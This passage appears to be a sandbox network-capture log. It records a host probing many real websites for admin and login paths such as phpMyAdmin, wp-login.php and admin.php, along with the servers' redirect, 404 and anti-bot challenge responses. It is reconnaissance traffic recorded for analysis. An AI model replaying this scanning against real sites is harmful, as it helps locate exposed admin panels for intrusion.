west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+
Feb 21, 2024 00:26:14.889678001 CET	497	IN	Data Raw: 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b Data Ascii: [])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMCont
Feb 21, 2024 00:26:14.889691114 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
367	192.168.2.6	64039	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.018884897 CET	169	OUT	GET /admin.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.114558935 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin.php ETag: "65d0dd59-0"
Feb 21, 2024 00:26:15.321439028 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
368	192.168.2.6	64041	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.019860983 CET	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.114612103 CET	214	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/pma/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:15.320290089 CET	214	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/pma/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
369	192.168.2.6	64040	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.037902117 CET	172	OUT	GET /admin/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.143893957 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
370	192.168.2.6	64038	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.090997934 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.260796070 CET	393	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/wp-login.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>
Feb 21, 2024 00:26:16.511267900 CET	223	OUT	GET /wp-admin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://stylesense.co.uk/wp-login.php
Feb 21, 2024 00:26:16.679009914 CET	346	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 37 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 fa 86 7a 46 86 7a 26 7a 86 c8 0a f5 61 46 eb 43 9d 05 00 40 53 92 9a 9f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 78(HML),I310Q/Qp/K&T$dCAfAyyE%zFz&zaFC@S0

Session ID	Source IP	Source Port	Destination IP	Destination Port
371	192.168.2.6	64195	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.152605057 CET	168	OUT	GET /pma/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.248357058 CET	218	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/pma/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:15.453912020 CET	218	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/pma/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
372	192.168.2.6	64246	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.179845095 CET	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.279371977 CET	364	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-37.ec2.internal X-Request-Id: ba67debb-743f-4052-a9cb-23bd9813b17b Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
373	192.168.2.6	64061	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.188273907 CET	178	OUT	GET /admin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.370057106 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
374	192.168.2.6	64278	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.188319921 CET	167	OUT	GET /pma/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.282428980 CET	217	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/pma/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:15.493535042 CET	217	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/pma/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
375	192.168.2.6	64073	91.195.240.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.192354918 CET	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.379585981 CET	343	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:15 GMT content-type: text/html content-length: 166 location: //www.schussundtor.de/PhpMyAdmin/ server: NginX Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
376	192.168.2.6	64196	162.0.235.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.225919008 CET	182	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.385786057 CET	1047	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:15 GMT server: LiteSpeed location: https://norwegischlernen.info/PhpMyAdmin/ x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
377	192.168.2.6	63259	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.245670080 CET	168	OUT	GET /pma/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.548346996 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
378	192.168.2.6	63377	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:15.264484882 CET	175	OUT	GET /admin.php HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:15.568285942 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:15 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 61 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b Data Ascii: 5ad<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+
Feb 21, 2024 00:26:15.568294048 CET	514	IN	Data Raw: 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b Data Ascii: !![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEvent
Feb 21, 2024 00:26:15.568300962 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
379	192.168.2.6	64250	185.39.146.199	80

Timestamp	Bytes transferred	Direction	Data
